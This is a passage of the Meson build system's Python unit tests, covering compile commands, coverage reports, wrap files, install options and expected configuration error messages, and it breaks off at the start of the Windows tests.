testdir = os.path.join(self.unit_test_dir, '73 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string : bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean : False
Another boolean: True
Some string : Hello World
A list : string
1
True
empty list :
A number : 1
yes : YES
no : NO
coma list : a, b, c
Stuff
missing prog : NO
existing prog : ''' + sys.executable + '''
missing dep : NO
internal dep : YES
Plugins
long coma list : alpha, alphacolor, apetag, audiofx, audioparsers, auparse,
autodetect, avi
Subprojects
sub : YES
sub2 : NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
def get_exe_name(basename: str) -> str:
if is_windows():
return '{}.exe'.format(basename)
else:
return basename
def get_shared_lib_name(basename: str) -> str:
if mesonbuild.environment.detect_msys2_arch():
return 'lib{}.dll'.format(basename)
elif is_windows():
return '{}.dll'.format(basename)
elif is_cygwin():
return 'cyg{}.dll'.format(basename)
elif is_osx():
return 'lib{}.dylib'.format(basename)
else:
return 'lib{}.so'.format(basename)
def get_static_lib_name(basename: str) -> str:
return 'lib{}.a'.format(basename)
# Base case (no targets or additional arguments)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
self.assertPathExists(os.path.join(self.builddir, get_exe_name('trivialprog')))
# `--clean`
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
# Target specified in a project with unique names
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--wipe'])
# Multiple targets and target type specified
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'mylib', 'mycpplib:shared_library'])
        # Check that we have a shared lib, but not an executable, i.e. that the target selection actually worked
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mylib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('prog')))
self.assertPathExists(os.path.join(self.builddir, get_shared_lib_name('mycpplib')))
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('cppprog')))
        # Target specified in a project with non-unique names
testdir = os.path.join(self.common_test_dir, '186 same target name')
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir, './foo'])
self.assertPathExists(os.path.join(self.builddir, get_static_lib_name('foo')))
self._run([*self.meson_command, 'compile', '-C', self.builddir, 'sub/foo'])
self.assertPathExists(os.path.join(self.builddir, 'sub', get_static_lib_name('foo')))
# run_target
testdir = os.path.join(self.common_test_dir, '52 run target')
self.init(testdir, extra_args=['--wipe'])
out = self._run([*self.meson_command, 'compile', '-C', self.builddir, 'py3hi'])
self.assertIn('I am Python3.', out)
# `--$BACKEND-args`
testdir = os.path.join(self.common_test_dir, '1 trivial')
if self.backend is Backend.ninja:
self.init(testdir, extra_args=['--wipe'])
# Dry run - should not create a program
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--ninja-args=-n'])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
elif self.backend is Backend.vs:
self.init(testdir, extra_args=['--wipe'])
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# Explicitly clean the target through msbuild interface
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--vs-args=-t:{}:Clean'.format(re.sub(r'[\%\$\@\;\.\(\)\']', '_', get_exe_name('trivialprog')))])
self.assertPathDoesNotExist(os.path.join(self.builddir, get_exe_name('trivialprog')))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '75 dep files')
        # Regression test: a spurious reconfigure was happening when the build
        # directory was inside the source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
        # During the first configure the file did not exist, so no dependency
        # should have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
        # During the reconfigure the file did exist, but it is inside the build
        # directory, so no dependency should have been set. A rebuild should not
        # trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '207 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '42 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '226 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
def test_commands_documented(self):
'''
Test that all listed meson commands are documented in Commands.md.
'''
# The docs directory is not in release tarballs.
if not os.path.isdir('docs'):
raise unittest.SkipTest('Doc directory does not exist.')
doc_path = 'docs/markdown/Commands.md'
md = None
with open(doc_path, encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
## Get command sections
section_pattern = re.compile(r'^### (.+)$', re.MULTILINE)
md_command_section_matches = [i for i in section_pattern.finditer(md)]
md_command_sections = dict()
for i, s in enumerate(md_command_section_matches):
section_end = len(md) if i == len(md_command_section_matches) - 1 else md_command_section_matches[i + 1].start()
md_command_sections[s.group(1)] = (s.start(), section_end)
## Validate commands
md_commands = set(k for k,v in md_command_sections.items())
help_output = self._run(self.meson_command + ['--help'])
help_commands = set(c.strip() for c in re.findall(r'usage:(?:.+)?{((?:[a-z]+,*)+?)}', help_output, re.MULTILINE|re.DOTALL)[0].split(','))
self.assertEqual(md_commands | {'help'}, help_commands, 'Doc file: `{}`'.format(doc_path))
## Validate that each section has proper placeholders
def get_data_pattern(command):
return re.compile(
r'{{ ' + command + r'_usage.inc }}[\r\n]'
r'.*?'
r'{{ ' + command + r'_arguments.inc }}[\r\n]',
flags = re.MULTILINE|re.DOTALL)
for command in md_commands:
m = get_data_pattern(command).search(md, pos=md_command_sections[command][0], endpos=md_command_sections[command][1])
self.assertIsNotNone(m, 'Command `{}` is missing placeholders for dynamic data. Doc file: `{}`'.format(command, doc_path))
def _check_coverage_files(self, types=('text', 'xml', 'html')):
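        # Helper: assert that the requested coverage report types were
        # generated under meson-logs.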
covdir = Path(self.builddir) / 'meson-logs'
files = []
if 'text' in types:
files.append('coverage.txt')
if 'xml' in types:
files.append('coverage.xml')
if 'html' in types:
files.append('coveragereport/index.html')
for f in files:
self.assertTrue((covdir / f).is_file(), msg='{} is not a file'.format(f))
def test_coverage(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_complex(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '106 generatorcustom')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage')
self._check_coverage_files()
def test_coverage_html(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
self._check_coverage_files(['html'])
def test_coverage_text(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-text')
self._check_coverage_files(['text'])
def test_coverage_xml(self):
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with coverage on MSYS2')
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found, or too old')
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_id() == 'clang':
if not mesonbuild.environment.detect_llvm_cov():
raise unittest.SkipTest('llvm-cov not found')
if cc.get_id() == 'msvc':
raise unittest.SkipTest('Test only applies to non-MSVC compilers')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-xml')
self._check_coverage_files(['xml'])
def test_cross_file_constants(self):
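        # Constants defined in an earlier machine file must be usable in later
        # files and in other sections such as [properties] and [binaries].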
with temp_filename() as crossfile1, temp_filename() as crossfile2:
with open(crossfile1, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
compiler = 'gcc'
'''))
with open(crossfile2, 'w') as f:
f.write(textwrap.dedent(
'''
[constants]
toolchain = '/toolchain/'
common_flags = ['--sysroot=' + toolchain / 'sysroot']
[properties]
c_args = common_flags + ['-DSOMETHING']
cpp_args = c_args + ['-DSOMETHING_ELSE']
[binaries]
c = toolchain / compiler
'''))
values = mesonbuild.coredata.parse_machine_files([crossfile1, crossfile2])
self.assertEqual(values['binaries']['c'], '/toolchain/gcc')
self.assertEqual(values['properties']['c_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING'])
self.assertEqual(values['properties']['cpp_args'],
['--sysroot=/toolchain/sysroot', '-DSOMETHING', '-DSOMETHING_ELSE'])
@unittest.skipIf(is_windows(), 'Directory cleanup fails for some reason')
def test_wrap_git(self):
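        # Create a local git repository as upstream, point a [wrap-git] file
        # at it, and verify that the subproject configures, builds and passes
        # its tests.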
with tempfile.TemporaryDirectory() as tmpdir:
srcdir = os.path.join(tmpdir, 'src')
shutil.copytree(os.path.join(self.unit_test_dir, '82 wrap-git'), srcdir)
upstream = os.path.join(srcdir, 'subprojects', 'wrap_git_upstream')
upstream_uri = Path(upstream).as_uri()
_git_init(upstream)
with open(os.path.join(srcdir, 'subprojects', 'wrap_git.wrap'), 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = {}
patch_directory = wrap_git_builddef
revision = master
'''.format(upstream_uri)))
self.init(srcdir)
self.build()
self.run_tests()
def test_multi_output_custom_target_no_warning(self):
testdir = os.path.join(self.common_test_dir, '229 custom_target source')
out = self.init(testdir)
self.assertNotRegex(out, 'WARNING:.*Using the first one.')
self.build()
self.run_tests()
@unittest.skipUnless(is_linux() and (re.search('^i.86$|^x86$|^x64$|^x86_64$|^amd64$', platform.processor()) is not None),
                         'Requires an ASM compiler for the x86 or x86_64 platform; currently only available on Linux CI runners')
def test_nostdlib(self):
testdir = os.path.join(self.unit_test_dir, '79 nostdlib')
machinefile = os.path.join(self.builddir, 'machine.txt')
with open(machinefile, 'w') as f:
f.write(textwrap.dedent('''
[properties]
c_stdlib = 'mylibc'
'''))
# Test native C stdlib
self.meson_native_file = machinefile
self.init(testdir)
self.build()
# Test cross C stdlib
self.new_builddir()
self.meson_native_file = None
self.meson_cross_file = machinefile
self.init(testdir)
self.build()
def test_meson_version_compare(self):
testdir = os.path.join(self.unit_test_dir, '83 meson version compare')
out = self.init(testdir)
self.assertNotRegex(out, r'WARNING')
def test_wrap_redirect(self):
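        # wrap-redirect files must point at a .wrap file located in
        # foo/subprojects/; anything else must raise a WrapException.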
redirect_wrap = os.path.join(self.builddir, 'redirect.wrap')
real_wrap = os.path.join(self.builddir, 'foo/subprojects/real.wrap')
os.makedirs(os.path.dirname(real_wrap))
# Invalid redirect, filename must have .wrap extension
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrapper
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be a .wrap file'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename cannot be in parent directory
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = ../real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename cannot contain ".."'):
PackageDefinition(redirect_wrap)
# Invalid redirect, filename must be in foo/subprojects/real.wrap
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/real.wrap
'''))
with self.assertRaisesRegex(WrapException, 'wrap-redirect filename must be in the form foo/subprojects/bar.wrap'):
wrap = PackageDefinition(redirect_wrap)
# Correct redirect
with open(redirect_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-redirect]
filename = foo/subprojects/real.wrap
'''))
with open(real_wrap, 'w') as f:
f.write(textwrap.dedent('''
[wrap-git]
url = http://invalid
'''))
wrap = PackageDefinition(redirect_wrap)
self.assertEqual(wrap.get('url'), 'http://invalid')
@skip_if_no_cmake
def test_nested_cmake_rebuild(self) -> None:
        # Regression check: when a non-meson project is used as a third-level
        # (or deeper) subproject, changing that project's build files must
        # still cause a rebuild.
testdir = os.path.join(self.unit_test_dir, '86 nested subproject regenerate depends')
cmakefile = Path(testdir) / 'subprojects' / 'sub2' / 'CMakeLists.txt'
self.init(testdir)
self.build()
with cmakefile.open('a') as f:
os.utime(str(cmakefile))
self.assertReconfiguredBuildIsNoop()
def test_version_file(self):
srcdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(srcdir)
projinfo = self.introspect('--projectinfo')
self.assertEqual(projinfo['version'], '1.0.0')
def test_cflags_cppflags(self):
envs = {'CPPFLAGS': '-DCPPFLAG',
'CFLAGS': '-DCFLAG',
'CXXFLAGS': '-DCXXFLAG'}
srcdir = os.path.join(self.unit_test_dir, '90 multiple envvars')
self.init(srcdir, override_envvars=envs)
self.build()
def test_build_b_options(self) -> None:
# Currently (0.57) these do nothing, but they've always been allowed
srcdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(srcdir, extra_args=['-Dbuild.b_lto=true'])
def test_install_skip_subprojects(self):
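        # `meson install --skip-subprojects [name]` must install only the main
        # project's files; skipping a name that does not match any subproject
        # installs everything.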
testdir = os.path.join(self.unit_test_dir, '91 install skip subprojects')
self.init(testdir)
self.build()
main_expected = [
'',
'share',
'include',
'foo',
'bin',
'share/foo',
'share/foo/foo.dat',
'include/foo.h',
'foo/foofile',
'bin/foo' + exe_suffix,
]
bar_expected = [
'bar',
'share/foo/bar.dat',
'include/bar.h',
'bin/bar' + exe_suffix,
'bar/barfile'
]
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() == 'msvc':
main_expected.append('bin/foo.pdb')
bar_expected.append('bin/bar.pdb')
prefix = destdir_join(self.installdir, self.prefix)
main_expected = [Path(prefix, p) for p in main_expected]
bar_expected = [Path(prefix, p) for p in bar_expected]
all_expected = main_expected + bar_expected
def check_installed_files(extra_args, expected):
args = ['install', '--destdir', self.installdir] + extra_args
self._run(self.meson_command + args, workdir=self.builddir)
all_files = [p for p in Path(self.installdir).rglob('*')]
self.assertEqual(sorted(expected), sorted(all_files))
windows_proof_rmtree(self.installdir)
check_installed_files([], all_expected)
check_installed_files(['--skip-subprojects'], main_expected)
check_installed_files(['--skip-subprojects', 'bar'], main_expected)
check_installed_files(['--skip-subprojects', 'another'], all_expected)
class FailureTests(BasePlatformTests):
'''
    Tests for failure conditions. Build files here should be generated
    dynamically; static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
        an error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
def assertMesonDoesNotOutput(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents does not output
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertNotRegex(out, match)
@skipIfNoPkgconfig
def test_dependency(self):
if subprocess.call(['pkg-config', '--exists', 'zlib']) != 0:
raise unittest.SkipTest('zlib not found with pkg-config')
a = (("dependency('zlib', method : 'fail')", "'fail' is invalid"),
("dependency('zlib', static : '1')", "[Ss]tatic.*boolean"),
("dependency('zlib', version : 1)", "Item must be a list or one of <class 'str'>"),
("dependency('zlib', required : 1)", "[Rr]equired.*boolean"),
("dependency('zlib', method : 1)", "[Mm]ethod.*string"),
("dependency('zlibfail')", self.dnf),)
for contents, match in a:
self.assertMesonRaises(contents, match)
def test_apple_frameworks_dependency(self):
if not is_osx():
raise unittest.SkipTest('only run on macOS')
self.assertMesonRaises("dependency('appleframeworks')",
"requires at least one module")
def test_extraframework_dependency_method(self):
code = "dependency('python', method : 'extraframework')"
if not is_osx():
self.assertMesonRaises(code, self.dnf)
else:
# Python2 framework is always available on macOS
self.assertMesonOutputs(code, '[Dd]ependency.*python.*found.*YES')
def test_sdl2_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('sdl2-config'):
raise unittest.SkipTest('sdl2-config found')
self.assertMesonRaises("dependency('sdl2', method : 'sdlconfig')", self.dnf)
if shutil.which('pkg-config'):
self.assertMesonRaises("dependency('sdl2', method : 'pkg-config')", self.dnf)
with no_pkgconfig():
# Look for pkg-config, cache it, then
# Use cached pkg-config without erroring out, then
# Use cached pkg-config to error out
code = "dependency('foobarrr', method : 'pkg-config', required : false)\n" \
"dependency('foobarrr2', method : 'pkg-config', required : false)\n" \
"dependency('sdl2', method : 'pkg-config')"
self.assertMesonRaises(code, self.nopkg)
def test_gnustep_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('gnustep-config'):
raise unittest.SkipTest('gnustep-config found')
self.assertMesonRaises("dependency('gnustep')",
"(requires a Objc compiler|{})".format(self.dnf),
langs = ['objc'])
def test_wx_notfound_dependency(self):
# Want to test failure, so skip if available
if shutil.which('wx-config-3.0') or shutil.which('wx-config') or shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('wx-config, wx-config-3.0 or wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets')", self.dnf)
self.assertMesonOutputs("dependency('wxwidgets', required : false)",
"Run-time dependency .*WxWidgets.* found: .*NO.*")
def test_wx_dependency(self):
if not shutil.which('wx-config-3.0') and not shutil.which('wx-config') and not shutil.which('wx-config-gtk3'):
raise unittest.SkipTest('Neither wx-config, wx-config-3.0 nor wx-config-gtk3 found')
self.assertMesonRaises("dependency('wxwidgets', modules : 1)",
"module argument is not a string")
def test_llvm_dependency(self):
self.assertMesonRaises("dependency('llvm', modules : 'fail')",
"(required.*fail|{})".format(self.dnf))
def test_boost_notfound_dependency(self):
# Can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost', modules : 1)",
"module.*not a string")
self.assertMesonRaises("dependency('boost', modules : 'fail')",
"(fail.*not found|{})".format(self.dnf))
def test_boost_BOOST_ROOT_dependency(self):
# Test BOOST_ROOT; can be run even if Boost is found or not
self.assertMesonRaises("dependency('boost')",
"(boost_root.*absolute|{})".format(self.dnf),
override_envvars = {'BOOST_ROOT': 'relative/path'})
def test_dependency_invalid_method(self):
code = '''zlib_dep = dependency('zlib', required : false)
zlib_dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, ".* is not a config-tool dependency")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_pkgconfig_variable('foo')
'''
self.assertMesonRaises(code, "Method.*pkgconfig.*is invalid.*internal")
code = '''zlib_dep = dependency('zlib', required : false)
dep = declare_dependency(dependencies : zlib_dep)
dep.get_configtool_variable('foo')
'''
self.assertMesonRaises(code, "Method.*configtool.*is invalid.*internal")
def test_objc_cpp_detection(self):
'''
Test that when we can't detect objc or objcpp, we fail gracefully.
'''
env = get_fake_env()
try:
env.detect_objc_compiler(MachineChoice.HOST)
env.detect_objcpp_compiler(MachineChoice.HOST)
except EnvironmentException:
code = "add_languages('objc')\nadd_languages('objcpp')"
self.assertMesonRaises(code, "Unknown compiler")
return
raise unittest.SkipTest("objc and objcpp found, can't test detection failure")
def test_subproject_variables(self):
'''
Test that:
1. The correct message is outputted when a not-required dep is not
found and the fallback subproject is also not found.
2. A not-required fallback dependency is not found because the
subproject failed to parse.
3. A not-found not-required dep with a fallback subproject outputs the
correct message when the fallback subproject is found but the
variable inside it is not.
4. A fallback dependency is found from the subproject parsed in (3)
5. A wrap file from a subproject is used but fails because it does not
contain required keys.
'''
tdir = os.path.join(self.unit_test_dir, '20 subproj dep variables')
out = self.init(tdir, inprocess=True)
self.assertRegex(out, r"Neither a subproject directory nor a .*nosubproj.wrap.* file was found")
self.assertRegex(out, r'Function does not take positional arguments.')
self.assertRegex(out, r'Dependency .*somenotfounddep.* from subproject .*subprojects/somesubproj.* found: .*NO.*')
self.assertRegex(out, r'Dependency .*zlibproxy.* from subproject .*subprojects.*somesubproj.* found: .*YES.*')
self.assertRegex(out, r'Missing key .*source_filename.* in subsubproject.wrap')
def test_exception_exit_status(self):
'''
Test exit status on python exception
'''
tdir = os.path.join(self.unit_test_dir, '21 exit status')
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(tdir, inprocess=False, override_envvars = {'MESON_UNIT_TEST': '1'})
self.assertEqual(cm.exception.returncode, 2)
self.wipe()
def test_dict_requires_key_value_pairs(self):
self.assertMesonRaises("dict = {3, 'foo': 'bar'}",
'Only key:value pairs are valid in dict construction.')
self.assertMesonRaises("{'foo': 'bar', 3}",
'Only key:value pairs are valid in dict construction.')
def test_dict_forbids_duplicate_keys(self):
self.assertMesonRaises("dict = {'a': 41, 'a': 42}",
'Duplicate dictionary key: a.*')
def test_dict_forbids_integer_key(self):
self.assertMesonRaises("dict = {3: 'foo'}",
'Key must be a string.*')
def test_using_too_recent_feature(self):
# Here we use a dict, which was introduced in 0.47.0
self.assertMesonOutputs("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.46.0')
def test_using_recent_feature(self):
# Same as above, except the meson version is now appropriate
self.assertMesonDoesNotOutput("dict = {}",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.47')
def test_using_too_recent_feature_dependency(self):
self.assertMesonOutputs("dependency('pcap', required: false)",
".*WARNING.*Project targeting.*but.*",
meson_version='>= 0.41.0')
def test_vcs_tag_featurenew_build_always_stale(self):
'https://github.com/mesonbuild/meson/issues/3904'
vcs_tag = '''version_data = configuration_data()
version_data.set('PROJVER', '@VCS_TAG@')
vf = configure_file(output : 'version.h.in', configuration: version_data)
f = vcs_tag(input : vf, output : 'version.h')
'''
msg = '.*WARNING:.*feature.*build_always_stale.*custom_target.*'
self.assertMesonDoesNotOutput(vcs_tag, msg, meson_version='>=0.43')
def test_missing_subproject_not_required_and_required(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub2 = subproject('not-found-subproject', required: true)",
""".*Subproject "subprojects/not-found-subproject" required but not found.*""")
def test_get_variable_on_not_found_project(self):
self.assertMesonRaises("sub1 = subproject('not-found-subproject', required: false)\n" +
"sub1.get_variable('naaa')",
"""Subproject "subprojects/not-found-subproject" disabled can't get_variable on it.""")
def test_version_checked_before_parsing_options(self):
'''
https://github.com/mesonbuild/meson/issues/5281
'''
options = "option('some-option', type: 'foo', value: '')"
match = 'Meson version is.*but project requires >=2000'
self.assertMesonRaises("", match, meson_version='>=2000', options=options)
def test_assert_default_message(self):
self.assertMesonRaises("k1 = 'a'\n" +
"assert({\n" +
" k1: 1,\n" +
"}['a'] == 2)\n",
r"Assert failed: {k1 : 1}\['a'\] == 2")
def test_wrap_nofallback(self):
self.assertMesonRaises("dependency('notfound', fallback : ['foo', 'foo_dep'])",
r"Dependency \'notfound\' not found and fallback is disabled",
extra_args=['--wrap-mode=nofallback'])
def test_message(self):
self.assertMesonOutputs("message('Array:', ['a', 'b'])",
r"Message:.* Array: \['a', 'b'\]")
def test_warning(self):
self.assertMesonOutputs("warning('Array:', ['a', 'b'])",
r"WARNING:.* Array: \['a', 'b'\]")
def test_override_dependency_twice(self):
self.assertMesonRaises("meson.override_dependency('foo', declare_dependency())\n" +
"meson.override_dependency('foo', declare_dependency())",
"""Tried to override dependency 'foo' which has already been resolved or overridden""")
@unittest.skipIf(is_windows(), 'zlib is not available on Windows')
def test_override_resolved_dependency(self):
self.assertMesonRaises("dependency('zlib')\n" +
"meson.override_dependency('zlib', declare_dependency())",
"""Tried to override dependency 'zlib' which has already been resolved or overridden""")
def test_error_func(self):
self.assertMesonRaises("error('a', 'b', ['c', ['d', {'e': 'f'}]], 'g')",
"Problem encountered: a b \['c', \['d', {'e' : 'f'}\]\] g")
@unittest.skipUnless(is_windows() or is_cygwin(), "requires Windows (or Windows via Cygwin)")
class WindowsTests(BasePlatformTests):
'''
Tests that should run on Cygwin, MinGW, and MSVC
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/windows')
@unittest.skipIf(is_cygwin(), 'Test only applicable to Windows')
@mock.patch.dict(os.environ)
def test_find_program(self):
'''
Test that Windows-specific edge-cases in find_program are functioning
correctly. Cannot be an ordinary test because it involves manipulating
